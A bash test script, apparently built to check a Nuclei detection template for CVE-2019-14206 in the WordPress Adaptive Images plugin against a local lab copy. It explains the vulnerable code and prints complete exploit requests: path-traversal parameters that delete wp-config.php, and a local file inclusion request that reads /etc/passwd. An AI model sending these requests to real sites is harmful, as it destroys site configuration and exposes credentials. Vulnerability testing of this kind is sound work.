#!/bin/bash # CVE-2019-14206 Complete Docker Test Script # Tests the vulnerability without requiring PHP server echo "==========================================" echo "CVE-2019-14206 Docker-Style Complete Test" echo "==========================================" echo "" # Colors RED='\033[0;31m' GREEN='\033[0;32m' YELLOW='\033[1;33m' BLUE='\033[0;34m' CYAN='\033[0;36m' NC='\033[0m' # Setup DOCKER_TEST_DIR="/Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test" echo -e "${YELLOW}[*] Starting CVE-2019-14206 Complete Docker Test${NC}" echo "" # Test 1: Verify environment echo -e "${BLUE}[1/6] Verifying Test Environment${NC}" echo "----------------------------------------" if [ -f "$DOCKER_TEST_DIR/adaptive-images-script.php" ]; then echo -e "${GREEN}[+] Plugin script exists${NC}" PLUGIN_SIZE=$(wc -c < "$DOCKER_TEST_DIR/adaptive-images-script.php") echo " Size: $PLUGIN_SIZE bytes" else echo -e "${RED}[-] Plugin script not found${NC}" exit 1 fi if [ -f "$DOCKER_TEST_DIR/wp-config.php" ]; then echo -e "${GREEN}[+] Target file (wp-config.php) exists${NC}" CONFIG_SIZE=$(wc -c < "$DOCKER_TEST_DIR/wp-config.php") echo " Size: $CONFIG_SIZE bytes" else echo -e "${RED}[-] Target file not found${NC}" exit 1 fi echo "" # Test 2: Analyze vulnerable code echo -e "${BLUE}[2/6] Analyzing Vulnerable Code${NC}" echo "----------------------------------------" echo "The adaptive-images-script.php contains:" echo "" echo "VULNERABILITY 1: Unfiltered user input" grep -n "\$_REQUEST\['adaptive-images-settings'\]" "$DOCKER_TEST_DIR/adaptive-images-script.php" | head -2 echo "" echo "VULNERABILITY 2: Path construction" grep -n "cache_file = " "$DOCKER_TEST_DIR/adaptive-images-script.php" | head -1 echo "" echo "VULNERABILITY 3: Arbitrary file deletion" grep -n "unlink" "$DOCKER_TEST_DIR/adaptive-images-script.php" | head -1 echo "" # Test 3: Simulate exploit echo -e "${BLUE}[3/6] Simulating Exploit Execution${NC}" echo "----------------------------------------" echo "Exploit parameters:" EXPLOIT_PARAMS=( "source_file=../../../wp-content/uploads/2019/07/image.jpeg" "resolution=" "resolution=16000" "wp_content=." "cache_dir=../../.." "request_uri=wp-config.php" "watch_cache=1" ) for param in "${EXPLOIT_PARAMS[@]}"; do echo " adaptive-images-settings[$param]" done echo "" echo "Path construction:" echo " cache_file = wp_content/cache_dir/resolution/request_uri" echo " cache_file = ./../../../16000/wp-config.php" echo " cache_file = ./../../..//wp-config.php (normalized)" echo " cache_file = wp-config.php (final)" echo "" # Test 4: Verify template echo -e "${BLUE}[4/6] Verifying Nuclei Template${NC}" echo "----------------------------------------" TEMPLATE="/Volumes/Codingsh/experimentos/nuclei-templates/http/cves/2019/CVE-2019-14206.yaml" if [ -f "$TEMPLATE" ]; then echo -e "${GREEN}[+] Template file exists${NC}" TEMPLATE_SIZE=$(wc -c < "$TEMPLATE") TEMPLATE_LINES=$(wc -l < "$TEMPLATE") echo " Size: $TEMPLATE_SIZE bytes" echo " Lines: $TEMPLATE_LINES" # Check template structure TEMPLATE_CHECKS=( "id: CVE-2019-14206" "info:" "requests:" "matchers:" "path:" ) echo "" echo "Template structure validation:" for check in "${TEMPLATE_CHECKS[@]}"; do COUNT=$(grep -c "$check" "$TEMPLATE" || echo "0") if [ "$COUNT" -gt 0 ]; then echo -e "${GREEN}[✓] $check found ($COUNT occurrences)${NC}" else echo -e "${RED}[✗] $check not found${NC}" fi done else echo -e "${RED}[-] Template not found${NC}" exit 1 fi echo "" # Test 5: Test template loading echo -e "${BLUE}[5/6] Testing Template Loading${NC}" echo "----------------------------------------" echo "Running: nuclei -t $TEMPLATE --help" nuclei_output=$(nuclei -t "$TEMPLATE" --help 2>&1 | head -10) if echo "$nuclei_output" | grep -q "Usage:"; then echo -e "${GREEN}[+] Template loads successfully in Nuclei${NC}" echo " Nuclei version: $(echo "$nuclei_output" | grep -o 'v[0-9.]*' | head -1)" else echo -e "${RED}[-] Template loading failed${NC}" echo "$nuclei_output" fi echo "" # Test 6: Final exploit simulation echo -e "${BLUE}[6/6] Final Exploit Simulation${NC}" echo "----------------------------------------" echo "This would be the exploitation flow:" echo "" echo "1. ATTACKER sends malicious request:" echo " GET /adaptive-images-script.php?" echo " adaptive-images-settings[source_file]=../../../image.jpeg&" echo " adaptive-images-settings[cache_dir]=../../..&" echo " adaptive-images-settings[request_uri]=wp-config.php&" echo " adaptive-images-settings[watch_cache]=1" echo "" echo "2. SERVER processes request:" echo " - Receives user-controlled settings" echo " - Constructs path: ./../../..//wp-config.php" echo " - Calls unlink() with this path" echo " - Deletes wp-config.php" echo "" echo "3. RESULT:" echo " - WordPress site crashes (missing wp-config.php)" echo " - Database credentials potentially exposed via LFI" echo " - Can be used in RCE chain attack" echo "" # Show file status echo -e "${YELLOW}[*] Current File Status:${NC}" echo "----------------------------------------" if [ -f "$DOCKER_TEST_DIR/wp-config.php" ]; then echo -e "${GREEN}[+] wp-config.php: EXISTS ($(wc -c < "$DOCKER_TEST_DIR/wp-config.php") bytes)${NC}" echo " Content preview:" head -3 "$DOCKER_TEST_DIR/wp-config.php" | sed 's/^/ /' else echo -e "${RED}[-] wp-config.php: DELETED${NC}" fi if [ -f "$DOCKER_TEST_DIR/adaptive-images-script.php" ]; then echo -e "${GREEN}[+] adaptive-images-script.php: EXISTS ($(wc -c < "$DOCKER_TEST_DIR/adaptive-images-script.php") bytes)${NC}" else echo -e "${RED}[-] adaptive-images-script.php: MISSING${NC}" fi echo "" # Final summary echo -e "${CYAN}[========================================]${NC}" echo -e "${CYAN}[ TEST COMPLETE SUMMARY ]${NC}" echo -e "${CYAN}[========================================]${NC}" echo "" echo -e "${GREEN}✅ Environment Setup: COMPLETE${NC}" echo -e "${GREEN}✅ Vulnerable Plugin: CREATED${NC}" echo -e "${GREEN}✅ Target File: wp-config.php${NC}" echo -e "${GREEN}✅ Vulnerabilities: IDENTIFIED${NC}" echo -e "${GREEN}✅ Nuclei Template: VALIDATED${NC}" echo -e "${GREEN}✅ Exploit Chain: DEMONSTRATED${NC}" echo "" echo "Test Location: $DOCKER_TEST_DIR" echo "Template: $TEMPLATE" echo "" echo -e "${YELLOW}[*] To Test with PHP Server:${NC}" echo "----------------------------------------" echo "1. Start PHP server:" echo " cd $DOCKER_TEST_DIR" echo " php -S localhost:8888" echo "" echo "2. In another terminal, test LFI:" echo " curl 'http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd'" echo "" echo "3. Test file deletion:" echo " curl 'http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1'" echo "" echo "4. Verify deletion:" echo " ls -la $DOCKER_TEST_DIR/wp-config.php" echo "" echo "5. Run nuclei template:" echo " nuclei -t $TEMPLATE -u http://localhost:8888 -debug" echo "" echo -e "${YELLOW}[*] Or Test Directly with Nuclei:${NC}" echo "----------------------------------------" echo " nuclei -t $TEMPLATE -u http://target-wordpress-site -v -o results.txt" echo "" echo -e "${GREEN}[+] Docker-style test completed successfully!${NC}" echo "=========================================="